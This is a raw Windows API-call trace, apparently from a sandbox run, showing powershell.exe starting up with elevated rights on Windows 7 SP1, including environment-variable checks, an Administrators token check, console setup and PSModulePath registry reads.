	[0611.951] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0611.951] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.951] CoTaskMemFree (pv=0x2edb20) 
	[0611.954] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0611.954] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.954] CoTaskMemFree (pv=0x2edb20) 
	[0611.955] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0611.955] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0611.955] CoTaskMemFree (pv=0x2edb20) 
	[0611.958] CoCreateGuid (in: pguid=0x10e128 | out: pguid=0x10e128*(Data1=0x20d8d1d4, Data2=0x3125, Data3=0x4c44, Data4=([0]=0x82, [1]=0x1c, [2]=0x7, [3]=0xab, [4]=0x60, [5]=0xab, [6]=0x84, [7]=0xbc))) returned 0x0
	[0613.061] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0613.061] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.061] CoTaskMemFree (pv=0x2edb20) 
	[0613.064] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0613.065] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.065] CoTaskMemFree (pv=0x2edb20) 
	[0613.067] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0613.067] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0613.067] CoTaskMemFree (pv=0x2edb20) 
	[0613.078] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0613.079] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x10ddd0 | out: lpConsoleScreenBufferInfo=0x10ddd0) returned 1
	[0613.093] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0614.160] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x10ddd0 | out: lpConsoleScreenBufferInfo=0x10ddd0) returned 1
	[0614.161] GetVersionExW (in: lpVersionInformation=0x10dd60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x10dd60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0614.163] GetCurrentProcess () returned 0xffffffffffffffff
	[0614.164] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x10ddf8 | out: TokenHandle=0x10ddf8*=0x314) returned 1
	[0614.168] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10dd18 | out: TokenInformation=0x0, ReturnLength=0x10dd18) returned 0
	[0614.169] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2572e0
	[0614.169] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x2572e0, TokenInformationLength=0x4, ReturnLength=0x10dd18 | out: TokenInformation=0x2572e0, ReturnLength=0x10dd18) returned 1
	[0614.171] DuplicateTokenEx (in: hExistingToken=0x314, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x10de78 | out: phNewToken=0x10de78*=0x2d8) returned 1
	[0614.171] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x10dd18 | out: TokenInformation=0x0, ReturnLength=0x10dd18) returned 0
	[0614.171] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x257290
	[0614.171] GetTokenInformation (in: TokenHandle=0x314, TokenInformationClass=0x8, TokenInformation=0x257290, TokenInformationLength=0x4, ReturnLength=0x10dd18 | out: TokenInformation=0x257290, ReturnLength=0x10dd18) returned 1
	[0614.172] CheckTokenMembership (in: TokenHandle=0x2d8, SidToCheck=0x2bcca48*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x10de88 | out: IsMember=0x10de88) returned 1
	[0614.172] CloseHandle (hObject=0x2d8) returned 1
	[0614.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d8e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0614.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0614.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0614.173] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d830, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.106] CoTaskMemAlloc (cb=0x804) returned 0x1b323080
	[0615.106] GetConsoleTitleW (in: lpConsoleTitle=0x1b323080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0615.106] CoTaskMemFree (pv=0x1b323080) 
	[0615.133] CoTaskMemAlloc (cb=0x804) returned 0x1b323930
	[0615.133] GetConsoleTitleW (in: lpConsoleTitle=0x1b323930, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0615.133] CoTaskMemFree (pv=0x1b323930) 
	[0615.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.137] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d810, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0615.138] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0620.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0620.993] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0620.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0620.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d950, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d8a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d9a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x10d8f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0623.972] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2e4
	[0623.973] CoCreateGuid (in: pguid=0x10df70 | out: pguid=0x10df70*(Data1=0x667260b1, Data2=0x6a67, Data3=0x4d6a, Data4=([0]=0xb1, [1]=0xe6, [2]=0x4c, [3]=0x78, [4]=0x86, [5]=0xc, [6]=0x80, [7]=0x4c))) returned 0x0
	[0623.974] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0623.974] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.974] CoTaskMemFree (pv=0x2edb20) 
	[0623.981] WinSqmIsOptedIn () returned 0x0
	[0623.982] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0623.982] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.982] CoTaskMemFree (pv=0x2edb20) 
	[0623.986] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0623.986] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.986] CoTaskMemFree (pv=0x2edb20) 
	[0623.987] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0625.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.008] CoTaskMemFree (pv=0x2edb20) 
	[0625.009] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0625.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.010] CoTaskMemFree (pv=0x2edb20) 
	[0625.011] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0625.011] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.011] CoTaskMemFree (pv=0x2edb20) 
	[0625.013] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0625.013] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.014] CoTaskMemFree (pv=0x2edb20) 
	[0625.015] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0625.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.015] CoTaskMemFree (pv=0x2edb20) 
	[0625.016] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0625.016] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.016] CoTaskMemFree (pv=0x2edb20) 
	[0625.021] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0625.021] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.021] CoTaskMemFree (pv=0x2edb20) 
	[0625.030] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0625.030] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.030] CoTaskMemFree (pv=0x2edb20) 
	[0625.032] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0625.032] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.032] CoTaskMemFree (pv=0x2edb20) 
	[0625.033] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0625.033] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0625.033] CoTaskMemFree (pv=0x2edb20) 
	[0628.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.423] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d3c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.427] CoTaskMemAlloc (cb=0x104) returned 0x2edb20
	[0628.427] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x2edb20, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0628.427] CoTaskMemFree (pv=0x2edb20) 
	[0628.429] CoTaskMemAlloc (cb=0xcc) returned 0x2f1ee0
	[0628.429] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2f1ee0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0628.429] CoTaskMemFree (pv=0x2f1ee0) 
	[0628.429] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x10dae8 | out: phkResult=0x10dae8*=0x2e8) returned 0x0
	[0628.429] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10da6c, lpData=0x0, lpcbData=0x10da68*=0x0 | out: lpType=0x10da6c*=0x2, lpData=0x0, lpcbData=0x10da68*=0x6c) returned 0x0
	[0628.429] CoTaskMemAlloc (cb=0x70) returned 0x290a60
	[0628.429] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x10da3c, lpData=0x290a60, lpcbData=0x10da38*=0x6c | out: lpType=0x10da3c*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x10da38*=0x6c) returned 0x0
	[0628.429] CoTaskMemFree (pv=0x290a60) 
	[0628.429] CoTaskMemAlloc (cb=0xcc) returned 0x2f1ee0
	[0628.430] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x2f1ee0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0628.430] CoTaskMemFree (pv=0x2f1ee0) 
	[0628.430] CoTaskMemAlloc (cb=0xcc) returned 0x2f1ee0
	[0628.430] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2f1ee0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0628.430] CoTaskMemFree (pv=0x2f1ee0) 
	[0628.432] RegCloseKey (hKey=0x2e8) returned 0x0
	[0628.432] CoTaskMemAlloc (cb=0xcc) returned 0x2f1ee0
	[0628.433] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x2f1ee0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0628.433] CoTaskMemFree (pv=0x2f1ee0) 
	[0628.433] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x10dae8 | out: phkResult=0x10dae8*=0x2e8) returned 0x0
